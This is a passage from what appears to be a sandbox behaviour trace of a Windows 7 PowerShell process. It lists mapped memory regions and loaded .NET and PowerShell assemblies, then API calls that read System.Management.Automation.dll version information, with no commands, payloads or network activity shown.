filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll")
Region:
id = 1614
start_va = 0x7ff00020000
end_va = 0x7ff0002ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00020000"
filename = ""
Region:
id = 1615
start_va = 0x7ff00030000
end_va = 0x7ff0003ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00030000"
filename = ""
Region:
id = 1616
start_va = 0x7ff00040000
end_va = 0x7ff000dffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00040000"
filename = ""
Region:
id = 1617
start_va = 0x7ff000e0000
end_va = 0x7ff000effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff000e0000"
filename = ""
Region:
id = 1618
start_va = 0x7ff000f0000
end_va = 0x7ff0015ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff000f0000"
filename = ""
Region:
id = 1619
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 1620
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 1711
start_va = 0x1cd0000
end_va = 0x1cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001cd0000"
filename = ""
Region:
id = 1712
start_va = 0x1b3d0000
end_va = 0x1b6b1fff
entry_point = 0x1b65ec1e
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1713
start_va = 0x7fee0230000
end_va = 0x7fee02e1fff
entry_point = 0x7fee0230000
region_type = mapped_file
name = "microsoft.powershell.consolehost.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll")
Region:
id = 1714
start_va = 0x7fee1fc0000
end_va = 0x7fee29e2fff
entry_point = 0x7fee1fc0000
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll")
Region:
id = 1715
start_va = 0x7ff00160000
end_va = 0x7ff0016ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00160000"
filename = ""
Region:
id = 1716
start_va = 0x7fffff10000
end_va = 0x7fffff1ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff10000"
filename = ""
Region:
id = 1717
start_va = 0x7fffff20000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff20000"
filename = ""
Region:
id = 1725
start_va = 0x7fedf470000
end_va = 0x7fedffccfff
entry_point = 0x7fedf470000
region_type = mapped_file
name = "system.management.automation.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll")
Region:
id = 1733
start_va = 0x2220000
end_va = 0x2222fff
entry_point = 0x2220000
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\System32\\l_intl.nls" (normalized: "c:\\windows\\system32\\l_intl.nls")
Region:
id = 1734
start_va = 0x1b6c0000
end_va = 0x1b77ffff
entry_point = 0x1b6c0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1735
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 1740
start_va = 0x2230000
end_va = 0x2230fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 1744
start_va = 0x2240000
end_va = 0x2244fff
entry_point = 0x2240000
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 1745
start_va = 0x2780000
end_va = 0x27c0fff
entry_point = 0x2780000
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 1746
start_va = 0x7ff00170000
end_va = 0x7ff0017ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00170000"
filename = ""
Region:
id = 1750
start_va = 0x7fedf020000
end_va = 0x7fedf051fff
entry_point = 0x7fedf020000
region_type = mapped_file
name = "system.configuration.install.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll")
Region:
id = 1751
start_va = 0x7fedf060000
end_va = 0x7fedf0c8fff
entry_point = 0x7fedf060000
region_type = mapped_file
name = "microsoft.powershell.commands.diagnostics.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll")
Region:
id = 1752
start_va = 0x7fedf0d0000
end_va = 0x7fedf3fdfff
entry_point = 0x7fedf0d0000
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll")
Region:
id = 1753
start_va = 0x2250000
end_va = 0x2257fff
entry_point = 0x2250000
region_type = mapped_file
name = "microsoft.wsman.runtime.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll")
Region:
id = 1754
start_va = 0x22e0000
end_va = 0x22e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000022e0000"
filename = ""
Region:
id = 1755
start_va = 0x1e230000
end_va = 0x1e278fff
entry_point = 0x1e230000
region_type = mapped_file
name = "system.transactions.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll")
Region:
id = 1756
start_va = 0x7fedee80000
end_va = 0x7fedef64fff
entry_point = 0x7fedee80000
region_type = mapped_file
name = "system.transactions.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll")
Region:
id = 1757
start_va = 0x7fedef70000
end_va = 0x7fedf019fff
entry_point = 0x7fedef70000
region_type = mapped_file
name = "microsoft.wsman.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll")
Region:
id = 1804
start_va = 0x22f0000
end_va = 0x22f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000022f0000"
filename = ""
Region:
id = 1805
start_va = 0x1b780000
end_va = 0x1b87ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001b780000"
filename = ""
Region:
id = 1806
start_va = 0x642ff4a0000
end_va = 0x642ff4a9fff
entry_point = 0x642ff4a4710
region_type = mapped_file
name = "culture.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll")
Region:
id = 1807
start_va = 0x7fedea50000
end_va = 0x7fedea8dfff
entry_point = 0x7fedea50000
region_type = mapped_file
name = "microsoft.powershell.security.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll")
Region:
id = 1808
start_va = 0x7fedeb40000
end_va = 0x7fedec57fff
entry_point = 0x7fedeb40000
region_type = mapped_file
name = "microsoft.powershell.commands.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll")
Region:
id = 1809
start_va = 0x7fedec60000
end_va = 0x7fedee75fff
entry_point = 0x7fedec60000
region_type = mapped_file
name = "microsoft.powershell.commands.utility.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll")
Region:
id = 1820
start_va = 0x2aa0000
end_va = 0x2af3fff
entry_point = 0x2aa0000
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll")
Region:
id = 1821
start_va = 0x7fede4e0000
end_va = 0x7fede674fff
entry_point = 0x7fede4e0000
region_type = mapped_file
name = "system.directoryservices.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll")
Region:
id = 1822
start_va = 0x7fede680000
end_va = 0x7fede7ebfff
entry_point = 0x7fede680000
region_type = mapped_file
name = "system.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll")
Region:
id = 1823
start_va = 0x7fee1530000
end_va = 0x7fee1bd4fff
entry_point = 0x7fee1530000
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll")
Region:
id = 1824
start_va = 0x7fef1ae0000
end_va = 0x7fef1ae6fff
entry_point = 0x7fef1ae11a0
region_type = mapped_file
name = "shfolder.dll"
filename = "\\Windows\\System32\\shfolder.dll" (normalized: "c:\\windows\\system32\\shfolder.dll")
Region:
id = 1872
start_va = 0x22f0000
end_va = 0x22f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000022f0000"
filename = ""
Region:
id = 1873
start_va = 0x2860000
end_va = 0x2870fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002860000"
filename = ""
Region:
id = 1874
start_va = 0x7fee1120000
end_va = 0x7fee12a3fff
entry_point = 0x7fee1206c60
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorjit.dll")
Region:
id = 1875
start_va = 0x7ff00180000
end_va = 0x7ff0018ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00180000"
filename = ""
Region:
id = 1876
start_va = 0x7ff00190000
end_va = 0x7ff0019ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00190000"
filename = ""
Region:
id = 1877
start_va = 0x7ff001a0000
end_va = 0x7ff001affff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001a0000"
filename = ""
Region:
id = 1878
start_va = 0x7ff001b0000
end_va = 0x7ff001bffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001b0000"
filename = ""
Region:
id = 1879
start_va = 0x7ff001c0000
end_va = 0x7ff001cffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001c0000"
filename = ""
Region:
id = 1880
start_va = 0x7ff001d0000
end_va = 0x7ff001dffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001d0000"
filename = ""
Region:
id = 1881
start_va = 0x7ff001e0000
end_va = 0x7ff001effff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001e0000"
filename = ""
Region:
id = 1882
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e1030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 1883
start_va = 0x7ff001f0000
end_va = 0x7ff001fffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff001f0000"
filename = ""
Region:
id = 1884
start_va = 0x7ff00200000
end_va = 0x7ff0020ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00200000"
filename = ""
Region:
id = 1885
start_va = 0x7ff00210000
end_va = 0x7ff0021ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00210000"
filename = ""
Region:
id = 1886
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd619658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1897
start_va = 0x1b880000
end_va = 0x1b97ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001b880000"
filename = ""
Region:
id = 1909
start_va = 0x27d0000
end_va = 0x27d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000027d0000"
filename = ""
Region:
id = 1910
start_va = 0x1b980000
end_va = 0x1bc7efff
entry_point = 0x1bc4e7b4
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_64\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_64\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 1911
start_va = 0x7feddb30000
end_va = 0x7fede37afff
entry_point = 0x7feddb30000
region_type = mapped_file
name = "system.data.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Data\\accc3a5269658c8c47fe3e402ac4ac1c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.data\\accc3a5269658c8c47fe3e402ac4ac1c\\system.data.ni.dll")
Region:
id = 1912
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f1020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1913
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd8410c0
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1914
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1915
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c1504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1916
start_va = 0x7ff00220000
end_va = 0x7ff0022ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00220000"
filename = ""
Region:
id = 1917
start_va = 0x7ff00230000
end_va = 0x7ff0023ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00230000"
filename = ""
Region:
id = 1918
start_va = 0x7ff00240000
end_va = 0x7ff0024ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00240000"
filename = ""
Region:
id = 1929
start_va = 0x2900000
end_va = 0x290ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 1930
start_va = 0x2910000
end_va = 0x291ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 1931
start_va = 0x2b00000
end_va = 0x2b0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1932
start_va = 0x2b10000
end_va = 0x2b1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b10000"
filename = ""
Region:
id = 1933
start_va = 0x7ff00250000
end_va = 0x7ff0025ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00250000"
filename = ""
Region:
id = 1934
start_va = 0x7ff00260000
end_va = 0x7ff0026ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00260000"
filename = ""
Region:
id = 1948
start_va = 0x2b30000
end_va = 0x2b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b30000"
filename = ""
Region:
id = 1949
start_va = 0x2b40000
end_va = 0x2b40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002b40000"
filename = ""
Region:
id = 1950
start_va = 0x1bde0000
end_va = 0x1c76ffff
entry_point = 0x0
region_type = private
name = "private_0x000000001bde0000"
filename = ""
Region:
id = 1951
start_va = 0x516f00000
end_va = 0x516fc5fff
entry_point = 0x516f24570
region_type = mapped_file
name = "diasymreader.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\diasymreader.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\diasymreader.dll")
Region:
id = 1952
start_va = 0x7ff00270000
end_va = 0x7ff0027ffff
entry_point = 0x0
region_type = private
name = "private_0x000007ff00270000"
filename = ""
Region:
id = 1953
start_va = 0x7fffff0e000
end_va = 0x7fffff0ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff0e000"
filename = ""
Thread:
id = 79
os_tid = 0x768
[0069.159] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0070.004] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
[0070.004] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
[0070.004] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
[0070.004] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
[0071.790] GetVersionExW (in: lpVersionInformation=0x10d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.791] GetVersionExW (in: lpVersionInformation=0x10d8a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d8a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0071.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0071.799] GetVersionExW (in: lpVersionInformation=0x10d610*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10d610*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0071.799] SetErrorMode (uMode=0x1) returned 0x1
[0071.800] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x10d770 | out: lpFileInformation=0x10d770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
[0071.800] SetErrorMode (uMode=0x1) returned 0x1
[0071.802] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x10d9e0 | out: lpdwHandle=0x10d9e0) returned 0x94c
[0071.889] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf80c8 | out: lpData=0x2bf80c8) returned 1
[0071.890] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x10d958, puLen=0x10d950 | out: lplpBuffer=0x10d958*=0x2bf8164, puLen=0x10d950) returned 1
[0071.891] lstrlenW (lpString="䅁") returned 1
[0071.896] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8240, puLen=0x10d8c0) returned 1
[0071.897] lstrlenW (lpString="Microsoft Corporation") returned 21
[0071.898] CoTaskMemAlloc (cb=0x2e) returned 0x214400
[0071.898] lstrcpyW (in: lpString1=0x214400, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
[0071.899] CoTaskMemFree (pv=0x214400)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8294, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="System.Management.Automation") returned 28
[0071.899] CoTaskMemAlloc (cb=0x3c) returned 0x2157d0
[0071.899] lstrcpyW (in: lpString1=0x2157d0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
[0071.899] CoTaskMemFree (pv=0x2157d0)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf82f0, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="6.1.7601.17514") returned 14
[0071.899] CoTaskMemAlloc (cb=0x20) returned 0x20f510
[0071.899] lstrcpyW (in: lpString1=0x20f510, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
[0071.899] CoTaskMemFree (pv=0x20f510)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8330, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0071.899] CoTaskMemAlloc (cb=0x44) returned 0x2157d0
[0071.899] lstrcpyW (in: lpString1=0x2157d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0071.899] CoTaskMemFree (pv=0x2157d0)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8398, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
[0071.899] CoTaskMemAlloc (cb=0x76) returned 0x1beb60
[0071.899] lstrcpyW (in: lpString1=0x1beb60, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
[0071.899] CoTaskMemFree (pv=0x1beb60)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8434, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="System.Management.Automation.dll") returned 32
[0071.899] CoTaskMemAlloc (cb=0x44) returned 0x2157d0
[0071.899] lstrcpyW (in: lpString1=0x2157d0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
[0071.899] CoTaskMemFree (pv=0x2157d0)
[0071.899] VerQueryValueW (in: pBlock=0x2bf80c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x10d8c8, puLen=0x10d8c0 | out: lplpBuffer=0x10d8c8*=0x2bf8498, puLen=0x10d8c0) returned 1
[0071.899] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
[0071.899] CoTaskMemAlloc (cb=0x58) returned 0x204fc0
